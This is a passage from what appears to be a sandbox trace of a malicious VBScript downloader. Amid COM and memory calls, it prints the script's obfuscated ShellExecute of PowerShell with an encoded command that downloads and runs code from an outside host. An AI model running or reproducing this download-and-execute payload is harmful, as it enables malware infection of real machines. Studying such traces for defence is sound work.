SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==\", \"\", \"open\", nilops\r\nmasnoslo = windir+\"\\System32\\WindowsPowerS\"&\"hell\\v1.0\\power\"&\"she\"&\"ll\"\r\nFirraryuq2.ShellExecute masnoslo, \" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==\", \"\", \"open\", nilops\r\nset Firraryuq2 = nothing\r\nset winsh = nothing\r\n", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0076.696] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0076.697] GetTickCount () returned 0x114b664
	[0076.697] GetTickCount () returned 0x114b664
	[0076.697] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0076.697] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0076.697] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0076.697] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0076.697] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0076.697] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0076.699] malloc (_Size=0x408) returned 0x3f3d40
	[0076.700] malloc (_Size=0x808) returned 0x402d00
	[0076.700] malloc (_Size=0x200) returned 0x3f4150
	[0076.700] realloc (_Block=0x3f4150, _Size=0x400) returned 0x403510
	[0076.701] free (_Block=0x403510) 
	[0076.701] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0076.701] malloc (_Size=0x70) returned 0x3e0100
	[0076.703] malloc (_Size=0x1008) returned 0x403510
	[0076.704] malloc (_Size=0xf68) returned 0x404520
	[0076.704] ??2@YAPEAX_K@Z () returned 0x42c950
	[0076.705] GetCurrentThreadId () returned 0x9a8
	[0076.705] GetCurrentThreadId () returned 0x9a8
	[0076.705] GetCurrentThreadId () returned 0x9a8
	[0076.705] GetCurrentThreadId () returned 0x9a8
	[0076.705] GetCurrentThreadId () returned 0x9a8
	[0076.705] GetCurrentThreadId () returned 0x9a8
	[0076.705] GetCurrentThreadId () returned 0x9a8
	[0076.705] GetCurrentThreadId () returned 0x9a8
	[0076.705] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x26c200 | out: lpclsid=0x26c200*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0076.707] SysStringLen (param_1=0x0) returned 0x0
	[0076.707] CoGetClassObject (in: rclsid=0x26c200*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c1d0 | out: ppv=0x26c1d0*=0x42ef40) returned 0x0
	[0077.089] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26a4a0 | out: lpSystemTimeAsFileTime=0x26a4a0*(dwLowDateTime=0x20899be0, dwHighDateTime=0x1d5eb2b)) 
	[0077.089] GetCurrentProcessId () returned 0x998
	[0077.089] GetCurrentThreadId () returned 0x9a8
	[0077.089] GetTickCount () returned 0x114b693
	[0077.089] QueryPerformanceCounter (in: lpPerformanceCount=0x26a4a8 | out: lpPerformanceCount=0x26a4a8*=19760129922) returned 1
	[0077.089] malloc (_Size=0x100) returned 0x3f1d80
	[0077.089] GetVersionExA (in: lpVersionInformation=0x26a280*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf3c52dc8, dwBuildNumber=0x7fe, dwPlatformId=0xf3c40000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x26a280*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0077.089] GetUserDefaultLCID () returned 0x409
	[0077.089] ??2@YAPEAX_K@Z () returned 0x42ef40
	[0077.090] ??2@YAPEAX_K@Z () returned 0x3ea060
	[0077.090] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26c000, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f
	[0077.090] lstrlenA (lpString="\\wscript.exe") returned 12
	[0077.090] lstrlenA (lpString="C:\\Windows\\System32\\CScript.exe") returned 31
	[0077.090] _strcmpi (_Str1="\\CScript.exe", _Str2="\\wscript.exe") returned -20
	[0077.090] _strcmpi (_Str1="\\CScript.exe", _Str2="\\cscript.exe") returned 0
	[0077.091] GetModuleHandleA (lpModuleName=0x0) returned 0xff6e0000
	[0077.091] GetProcAddress (hModule=0xff6e0000, lpProcName=0x1) returned 0xff6e1a60
	[0077.091] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0077.091] GetCurrentThreadId () returned 0x9a8
	[0077.092] LoadRegTypeLib (in: rguid=0x7fef3c52df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x26c1f0*=0x26c260 | out: pptlib=0x26c1f0*=0x5a48f30) returned 0x0
	[0077.100] ITypeLib:GetTypeInfoOfGuid (in: This=0x5a48f30, GUID=0x7fef3c52c30*(Data1=0x41904400, Data2=0xbe18, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x8b, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x26c238 | out: ppTInfo=0x26c238*=0x648a4c8) returned 0x0
	[0077.100] ITypeInfo:GetRefTypeOfImplType (in: This=0x648a4c8, index=0xffffffff, pRefType=0x26c228 | out: pRefType=0x26c228*=0xfffffffe) returned 0x0
	[0077.100] ITypeInfo:GetRefTypeInfo (in: This=0x648a4c8, hreftype=0xfffffffe, ppTInfo=0x7fef3c5c128 | out: ppTInfo=0x7fef3c5c128*=0x648a520) returned 0x0
	[0077.100] IUnknown:Release (This=0x648a4c8) returned 0x1
	[0077.100] IUnknown:Release (This=0x5a48f30) returned 0x1
	[0077.100] IUnknown:AddRef (This=0x648a520) returned 0x2
	[0077.100] ITypeInfo:LocalGetIDsOfNames (This=0x648a520) returned 0x0
	[0077.100] IUnknown:Release (This=0x648a520) returned 0x1
	[0077.100] IUnknown:AddRef (This=0x648a520) returned 0x2
	[0077.100] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
	[0077.100] ITypeInfo:LocalInvoke (This=0x648a520) returned 0x0
	[0077.102] lstrlenW (lpString="Process") returned 7
	[0077.102] lstrlenW (lpString="SYSTEM") returned 6
	[0077.102] lstrlenW (lpString="Process") returned 7
	[0077.102] lstrlenW (lpString="USER") returned 4
	[0077.103] lstrlenW (lpString="Process") returned 7
	[0077.103] lstrlenW (lpString="VOLATILE") returned 8
	[0077.103] lstrlenW (lpString="Process") returned 7
	[0077.103] lstrlenW (lpString="PROCESS") returned 7
	[0077.103] ??2@YAPEAX_K@Z () returned 0x42c9a0
	[0077.103] IUnknown:Release (This=0x648a520) returned 0x1
	[0077.103] GetCurrentThreadId () returned 0x9a8
	[0077.103] LoadRegTypeLib (in: rguid=0x7fef3c52df0*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x26bf50*=0x3ea060 | out: pptlib=0x26bf50*=0x5a48f30) returned 0x0
	[0077.104] ITypeLib:GetTypeInfoOfGuid (in: This=0x5a48f30, GUID=0x7fef3c52e90*(Data1=0xf935dc29, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), ppTInfo=0x26bf98 | out: ppTInfo=0x26bf98*=0x648a6d8) returned 0x0
	[0077.105] ITypeInfo:GetRefTypeOfImplType (in: This=0x648a6d8, index=0xffffffff, pRefType=0x26bf88 | out: pRefType=0x26bf88*=0xfffffffe) returned 0x0
	[0077.105] ITypeInfo:GetRefTypeInfo (in: This=0x648a6d8, hreftype=0xfffffffe, ppTInfo=0x7fef3c5c2a8 | out: ppTInfo=0x7fef3c5c2a8*=0x648a730) returned 0x0
	[0077.105] IUnknown:Release (This=0x648a6d8) returned 0x1
	[0077.105] IUnknown:Release (This=0x5a48f30) returned 0x2
	[0077.105] IUnknown:AddRef (This=0x648a730) returned 0x2
	[0077.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
	[0077.105] ITypeInfo:LocalInvoke (This=0x648a730) returned 0x0
	[0077.105] GetEnvironmentVariableW (in: lpName="WINDIR", lpBuffer=0x26b890, nSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa
	[0077.105] IUnknown:Release (This=0x648a730) returned 0x1
	[0077.105] GetCurrentThreadId () returned 0x9a8
	[0077.105] CLSIDFromProgIDEx (in: lpszProgID="shell.application", lpclsid=0x26c200 | out: lpclsid=0x26c200*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0077.107] SysStringLen (param_1=0x0) returned 0x0
	[0077.107] CoGetClassObject (in: rclsid=0x26c200*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c1d0 | out: ppv=0x26c1d0*=0x7fefe4b8d20) returned 0x0
	[0077.108] Shell:IUnknown:QueryInterface (in: This=0x7fefe4b8d20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26c1d8 | out: ppvObject=0x26c1d8*=0x0) returned 0x80004002
	[0077.108] Shell:IClassFactory:CreateInstance (in: This=0x7fefe4b8d20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c1c0 | out: ppvObject=0x26c1c0*=0x6499da0) returned 0x0
	[0077.109] Shell:IUnknown:Release (This=0x7fefe4b8d20) returned 0x1
	[0077.109] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c198 | out: ppvObject=0x26c198*=0x6499de0) returned 0x0
	[0077.109] ??2@YAPEAX_K@Z () returned 0x42ef40
	[0077.109] Shell:IObjectWithSite:SetSite (This=0x6499de0, pUnkSite=0x42ef40) returned 0x0
	[0077.109] XMLHTTPRequest:IUnknown:AddRef (This=0x42ef40) returned 0x2
	[0077.110] Shell:IUnknown:Release (This=0x6499de0) returned 0x1
	[0077.110] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c1a8 | out: ppvObject=0x26c1a8*=0x6499da0) returned 0x0
	[0077.111] Shell:IUnknown:AddRef (This=0x6499da0) returned 0x3
	[0077.111] Shell:IUnknown:Release (This=0x6499da0) returned 0x2
	[0077.111] Shell:IUnknown:Release (This=0x6499da0) returned 0x1
	[0077.111] GetCurrentThreadId () returned 0x9a8
	[0077.111] Shell:IUnknown:AddRef (This=0x6499da0) returned 0x2
	[0077.112] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002
	[0077.112] Shell:IDispatch:GetIDsOfNames (in: This=0x6499da0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26c620*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x26c3d4 | out: rgDispId=0x26c3d4*=1610809345) returned 0x0
	[0077.123] Shell:IUnknown:AddRef (This=0x6499da0) returned 0x2
	[0077.123] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c160 | out: ppvObject=0x26c160*=0x0) returned 0x80004002
	[0077.123] Shell:IDispatch:Invoke (in: This=0x6499da0, dispIdMember=1610809345, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180, puArgErr=0x26c150 | out: pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26c150*=0x3c7350) returned 0x0
	[0077.232] Shell:IUnknown:Release (This=0x6499da0) returned 0x1
	[0077.233] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002
	[0077.233] Shell:IDispatch:GetIDsOfNames (in: This=0x6499da0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26c620*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x26c3d4 | out: rgDispId=0x26c3d4*=1610809345) returned 0x0
	[0077.233] Shell:IUnknown:AddRef (This=0x6499da0) returned 0x2
	[0077.233] Shell:IUnknown:QueryInterface (in: This=0x6499da0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26c160 | out: ppvObject=0x26c160*=0x0) returned 0x80004002
	[0077.233] Shell:IDispatch:Invoke (in: This=0x6499da0, dispIdMember=1610809345, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180, puArgErr=0x26c150 | out: pDispParams=0x26c138*(rgvarg=([0]=0x42bcc8*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dd08*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), varVal2=0x0), [1]=0x42bce0*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x0), [2]=0x42bcf8*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), [3]=0x42bd10*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=" -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA==", varVal2=0x0), [4]=0x42bd28*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42dcb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26c180*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26c150*=0x3c7350) returned 0x0
	[0077.577] Shell:IUnknown:Release (This=0x6499da0) returned 0x1
	[0077.579] XMLHTTPRequest:IUnknown:Release (This=0x42ef40) returned 0x0
	[0077.579] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0077.580] IUnknown:Release (This=0x3ea060) returned 0x0
	[0077.580] IUnknown:Release (This=0x648a520) returned 0x0
	[0077.580] ??3@YAXPEAX@Z () returned 0xa700020001
	[0077.580] ??3@YAXPEAX@Z () returned 0x7b00340001
	[0077.580] free (_Block=0x404520) 
	[0077.581] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0077.581] ??3@YAXPEAX@Z () returned 0xa800080001
	[0077.582] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0077.582] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0077.582] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0077.582] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0077.583] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), 